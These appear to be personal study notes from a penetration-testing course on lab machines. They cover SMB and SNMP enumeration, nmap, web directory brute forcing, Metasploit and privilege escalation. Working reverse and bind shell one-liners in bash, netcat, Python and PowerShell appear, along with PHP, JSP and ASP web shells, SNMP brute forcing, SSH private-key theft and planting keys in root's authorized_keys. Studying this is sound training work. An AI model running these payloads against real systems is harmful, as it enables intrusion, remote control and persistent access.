2. Getting Started

Risk Management

Risk Management

Data protection on policy without negatively affecting org

1. Identify: Legal, environmental, market, regulatory, etc...

2. Analyze: Determines impact, probability. Mapped to policies, procedures, processes

3. Evaluate: Org decides to accept unavoidable, avoid (change plans), control (mitigate) or transfer risk (insure)

4. Deal: Eliminate as possible. Interfacing with stakeholders

5. Monitor: Situational changes that could change impact, from low-medium-high impact

Handy Cmds:

netstat -rn // show accessible networks w/vpn

Kernel IP routing table
Destination     Gateway         Genmask         Flags   MSS Window  irtt Iface
0.0.0.0         192.168.1.2     0.0.0.0         UG        0 0          0 eth0
10.10.14.0      0.0.0.0         255.255.254.0   U         0 0          0 tun0
10.129.0.0      10.10.14.1      255.255.0.0     UG        0 0          0 tun0
192.168.1.0     0.0.0.0         255.255.255.0   U         0 0          0 eth0

---

Services

SMB

Server Message Block:

• SMB allows users, admins to share folders, make them accessible

• A tool that can enum with SMB shares is smbclient

• -L Retrieve list of avail shares on remote host

• -N Suppress passwd

• get file.txt Download a file

SNMP

Simple Network Management Protocol:

• Community strings provide info, stats about router, device

• Default strings of public and private often unchanged

• SNMP versions 1, 2c: Access controlled using plaintext string

  • If we know the name, we can gain access

Encryption/auth were added in SNMP v3

#smbclient
smbclient -N -L \\\\10.10.10.0 # list SMB shares
smbclient \\\\10.10.10.0\\users # connect to SMB share
smbclient --no-pass -L //10.10.10.1 # null user
smbclient -U 'user[%passwd]' -L [--pw-nt-hash] //10.10.10.1 # use NT hash
smbclient -U '%' -N \\\\10.10.10.1\\<SHARE> # null session to share

#snmpwalk
snmpwalk -v 2c -c public 10.10.10.1 1.3.6.1.2.1.1.5.0 # scan snmp on ip 
snmpget -V # what version is running locally?

#handy OID's to know
1.3.6.1.2.1.1.1.0 # system description
1.3.6.1.4.1.77.1.2.25 # win usrs
1.3.6.1.2.1.25.4.2.1.2 # running procs
1.3.6.1.2.1.2.2.1.2 # int name
1.3.6.1.2.1.6.13.1.3 # open tcp ports
1.3.6.1.2.1.25.6.3.1.2 # software
1.3.6.1.2.1.25.2.3.1.4 # storage units
1.3.6.1.2.1.4.35 # nat table
1.3.6.1.2.1.4.21 # ip route table
1.3.6.1.2.1.31.1.1.1 # wireless table

#other 
onesixtyone -c brute.txt 10.10.10.1 # brute force snmp secret
enum4linux -a # enum4linux scan

Tmux primer by ippsec

tmux primer by ippsec

Vim Primer

vim primer for beginners

nc/socat

Netcat: Win: netcat | Win alt: PowerCat socat Features nc doesn't have (fwding ports, connecting to serial devices)

• Can also be used to upgrade a shell to a full TTY

• Standaloin of socat: Can xfer to a system after RCE to get more stable revshell

tmux

Terminal multiplexers: tmux/screen: Multiple windows in one term/jumping between

• Cheatsheet

vim

Vim

• Create new file: Input file name

• Once open, read-only normal mode allows us to navigate/read file

• To edit: Hit i to enter insert mode, shown by "-- INSERT --" at bottom

• Once finished: Hit esc to get out of insert back into normal mode

We can multiply any cmd to run multiple times by adding a number before it

• Example: 4yw would copy 4 words instead of one

Save a file/quit: Press: to go into command mode

• Once we do, we will see any commands we type at the bottom of the vim window

---

#tmux
ctrl +b # default prefix
prefix c # new window
prefix 1 # swap to window 1
prefix + shift + % # split vertically
prefix + shift + " # split horizontally
prefix + -> # swap to right pane

#vim
esc + i # insert mode
esc # normal mode 
x # cut char
dw # cut word 
dd # cut line
yw # cp word
yy # cp line
p # paste
:1 # go to line 1
:w # write file 'save'
:q # quit
:q! # save/quit

nmap

#nmap
nmap -sV -sC -p- 10.10.10.0 # ver (V), script (sC), all ports (-p-)
locate scripts/critrix # list nmap scripts
ls /usr/share/nmap/scripts | snmp # also lists nmap scripts
nmap --script smb-os-discovery.nse -p 445 10.10.10.0 # run nse script 
nmap --script=banner -p 80 10.10.10.1 # banner grab

#example
nmap --script smb-os-discovery.nse -p445 10.10.10.40
Host script results:
| smb-os-discovery: 
|   OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
|   OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
|   Computer name: CEO-PC
|   NetBIOS computer name: CEO-PC\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2020-12-27T00:59:46+00:00

#netcat 
nc 10.10.10.1 # banner grab

sudo apt install seclists -y # install seclists

Web Enums

• ffuf or GoBuster to perform dir enum

• Additional functionality, such as enum public AWS S3 buckets

Add a DNS Server such as 1.1.1.1 to /etc/resolv.conf

• EyeWitness/Aquatone can be used to take screens of targets, fingerprint, and id for default creds

Certificates: SSL/TLS certificates are another potentially valuable source of info if HTTPS is in use

• Viewing cert reveals details: Programs like testssl.sh and sslscan are great for this

• Email/company name could be used to conduct a phishing attack if in scope

• robots.txt Common for sites to contain:

  • Tells engines/crawlers like Googlebot which resources can/can't be accessed for indexing

  • Can provide location of private files/admin pages

• Source Code: Worth checking source code for any pages

#web enums
gobuster dir -u http://10.10.10.1 -w /usr/share/dirb/wordlists/common.txt #dir scan
gobuster dns -d site.com -w /usr/share/SecLists/Discovery/DNS/namelist.txt #subd 

feroxbuster -x php -u http://10.10.10.1 # look for php in search
dirsearch -u http://10.10.10.1

curl 10.10.10.1/robots.txt # check robots.txt
curl -IL https://www.website.com # banner grab

whatweb --no-errors 10.10.10.1 # web server/cert details
ctrl +U # view page source in browser

---

Virtual Machines

VM

• Hyper-V on Windows

• Virtual machines on bare metal hypervisors such as Proxmox or VMware ESXi

• Hypervisors: VirtualBox, or VMware Workstation Player on Windows/Linux

• VMware Workstation, requires a paid license but offers many features Hypervisor: Allows us to create/run VMs: Enables us to use host to run VMs by virtually sharing mem/resources

• Run isolated from primary OS, which offers isolation/protection

ISO/OVA

ISO: Optical disc image: CD-ROM that can be mounted to build a VM by installing OS

OVA: Open Virtual Appliance: A pre-built virtual appliance

• Contains an OVF XML file: Specifies the VM hardware settings

• VMDK: Virtual disk the OS is installed on Parrot maintains a variety of helpful docs

• What is Parrot? Install Config

Folder Structure: Have clear folder structure on machine to save data

moo@htb[/htb]$ tree Projects/
Projects/
└── Acme Company
    ├── EPT (External Pentest)
    │   ├── evidence
    │   │   ├── credentials
    │   │   ├── data
    │   │   └── screenshots
    │   ├── logs
    │   ├── scans
    │   ├── scope
    │   └── tools

What's a shell?

A program that takes input from user and passes cmds to OS for tasks

bash was originally Unix's sh, and others like zsh, tcsh, ksh, etc.. exist

Shell Types

Reverse

Initiates connection back to a listener on our attack box

Bind

Binds to a port on the target host, waits for a connection from our attack box

Web

cmds via browser, not interactive/semi-interactive

• single cmds (i.e., file upload/PHP script to run single cmd)

---

Public Exploits

sudo apt install exploitdb -y
searchsploit openssh 7.2

Online exploit DBs to search for vulns: Exploit DB, Rapid7 DB, Vuln Lab

Metasploit

Metasploit Framework: Contains built-in exploits of public vulns

• Recon scripts enum hosts, compromised targets

• Verification scripts validate vulnerabilities without hacking it

• Meterpreter -Connect to shells, run cmds on hacked targets

• Post-exploit/pivot tools

MSF cmds

msfconsole -q # start metasploit without banner
search exploit eternalblue # use number: search can apply filters 
cve:2009type:exploit
help search # shows all filters 
options # show module options
check # not every exploit supports this - checks if target vuln
run or exploit # start attempt

Reverse Shell Commands

Reverse Shell Commands

Cmd we exec depends on OS a compromised host runs: What apps/cmds we can access

• Payload All The Things: Comprehensive list of revshells we can use

• Certain cmds are more reliable: Can be attempted to get a reverse connection

bash -c 'bash -i >& /dev/tcp/x.x/1234 0>&1'
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.10.10',1234);$s = $client.GetStream();[byte[]]$b = 0..65535|%{0};while(($i = $s.Read($b, 0, $b.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($b,0, $i);$sb = (iex $data 2>&1 | Out-String );$sb2 = $sb + 'PS ' + (pwd).Path + '> ';$sbt = ([text.encoding]::ASCII).GetBytes($sb2);$s.Write($sbt,0,$sbt.Length);$s.Flush()};$client.Close()"

• Once cmd loses connection: Have to rerun exploit for access

Bind Shell

Waits for us to connect, gives us control with nc ip addr 1234

• Unlike a revshell that connects to us: we connect to it on the targets' listening port

• Once we exec a bind shell cmd, it will start listening on a port on the remote host

  • It will bind that host's shell, to that port

  • We connect that port with nc, get control through a shell on that system

The following are reliable commands we can use to start a bind shell:

bash:

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc -lvp 1234 >/tmp/f

python:

python -c 'exec("""import socket as s,subprocess as sp;s1=s.socket(s.AF_INET,s.SOCK_STREAM);s1.setsockopt(s.SOL_SOCKET,s.SO_REUSEADDR, 1);s1.bind(("0.0.0.0",1234));s1.listen(1);c,a=s1.accept();\nwhile True: d=c.recv(1024).decode();p=sp.Popen(d,shell=True,stdout=sp.PIPE,stderr=sp.PIPE,stdin=sp.PIPE);c.sendall(p.stdout.read()+p.stderr.read())""")'

powershell:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command $listener = [System.Net.Sockets.TcpListener]1234; $listener.start();$client = $listener.AcceptTcpClient();$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + " ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close();

• Unlike revshells, if we drop a connection to a bind shell, we can connect back immediately

• If the shell cmd stopped, or the remote host rebooted: Then we'd lose access

Upgrade TTY

We can only type cmds/backspace when connected/can't move the cursor etc..

• We can upgrade our TTY by mapping term TTY with remote one

python -c 'import pty; pty.spawn("/bin/bash")'
ctrl +z # background: get back on local term
stty raw -echo # raw mode: what's sent is exactly what's received
fg # foreground
echo $TERM # see terminal type
stty size # size for rows/columns
export TERM=xterm-256color # change term settings
stty rows 67 columns 318 # change row/column size settings

Web Shell

Accepts cmd via HTTP params like GET/POST execs, prints back: web scripts (PHP/ASP)

• Web shell scripts typically 1-liners

• Need to place our script into the remote host's web dir (webroot) to exec through browser

<?php system($_REQUEST["cmd"]); ?> #php

<% Runtime.getRuntime().exec(request.getParameter("cmd")); %> //jsp

<% eval request("cmd") %>  # asp  

Uploading a Web Shell:

• Need to place our script into the remote host's web dir (webroot) to exec through browser

• Can be done with vuln in upload that allows us to write a shell to file (shell.php)

• If we have RCE via exploit, we can write our shell directly to webroot for access over web

• First: ID where webroot is

Default webroots:

/var/www/html # apache
/usr/local/nginx/html/ #nginx
c:\inetpub\wwwroot\ #iis
C:\xampp\htdocs\ #xampp

We can check dirs to see which webroot is in use

• use echo to write out shell

  • If we're attacking apache, we can write a php shell:

  • echo '<?php system($_REQUEST["cmd"]); ?>' > /var/www/html/shell.php`

We can access our shell through a browser or curl

• Visit shell.php page on site, and use ?cmd=id to execute id:

  • http://server_ip:port/shell.php?cmd=id 

  • we can also use curl

  • curl http://SERVER_IP:PORT/shell.php?cmd=id

---

Privilege Escalation

HackTricks, PayloadsAllTheThings, LinEnum, linuxprivchecker,

Win: Seatbelt, JAWS, PEASS || Noisy: Will trigger stuff

dkpg -l # see what software is installed
C:\Program Files # see what software is installed windows 
find / -perm -u=s -type f 2>/dev/null # find all perms with s
sudo -l # check what sudo privs we have

User Privileges

sudo

Allows a user to exec cmds as a diff user: Lower priv users to exec cmds as root without access

suid

Set user id: Perm that assigns to exec files: users who exec file temp assume privs of file's owner

windows token privileges

Security objects that contain info about user privs

• User logs in, LSA: Local Security Authority creates access token: Contains list of privs

• GTFOBins List of cmds/how they can be exploited through sudo

• LOLBAS List of Win apps leverage, like downloading files/exec cmds

---

Scheduled Tasks

Cron jobs: Form of scheduling tasks with specific dirs we utilize to add jobs: Need right perms

1. /etc/crontab
2. /etc/cron.d
3. /var/spool/cron/crontabs/root

• If we can write to a dir called by a cron job: should send us a shell when exec

Exposed Credentials Common config files, logs, user history (bash_history/PSReadLine in Win)

SSH Keys If we have read access over .ssh dir for a specific user

• We might be able to read priv ssh keys in

  • /home/user/.ssh/id_rsa or /root/.ssh/id_rsa and use that to log in

  • If we can read the /root/.ssh/ dir, we can cp it to our machine using -i

cat /home/user/.ssh/id_rsa or cat /home/root.ssh/id_rsa
vim id_rsa
chmod 600 id_rsa # changes perms to be more restricetive: 
# lax perms means ssh server could prevent them from working  
ssh mootarget@10.10.10.10 -i id_rsa

• If we see write access to a user/.ssh/ dir, can place our public key in the dir

• SSH config won't accept keys written by other users, so works if we have control over them

cat /home/user/.ssh/authorized_keys 
ssh-keygen -f key # create new key, -f output file
# 2 files created 
1. key (we use this with ssh -i)
2. key.pub # we copy this to the remote machine
# cp key.pub onto the remote machine
# add it to /home/root/.ssh/authorized_keys

echo "ssh-rsa DSJDKLAAAAB...SNIP...M= user@parrot" >> /root/.ssh/authorized_keys
# echo typically achieves this and all we're doing here is appending it to the file
ssh root@10.10.10.1 -i key

---

Transferring Files Python HTTP server on our machine and wget/cURL to download files

cd /tmp # go into tmp
python3 -m http.server 8000 # start simple server

wget http://10.10.14.1:8000/linenum.sh # has to be in the same dir listed - dl
curl http://10.10.14.1:8000/linenum.sh -o linenum.sh # -o output file name
scp linenum.sh user@remotehost:/tmp/linenum.sh 
# specify local file w/scp, remote dir saved 

Base64 base64 encode the file into b64, paste the str on the remote server, decod

base64 shell -w 0 # xsfer bin file shell, b64 encode it
f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU

echo f0VMRgA... <SNIP> ...lIuy9iaW4vc2gAU0iJ51JXSInmDwU | base64 -d > shell
# copy b64 str, go to remote host: use b64 -d to decode and pip to file

file shell # validate file format
md5sum shell # check md5sums of both files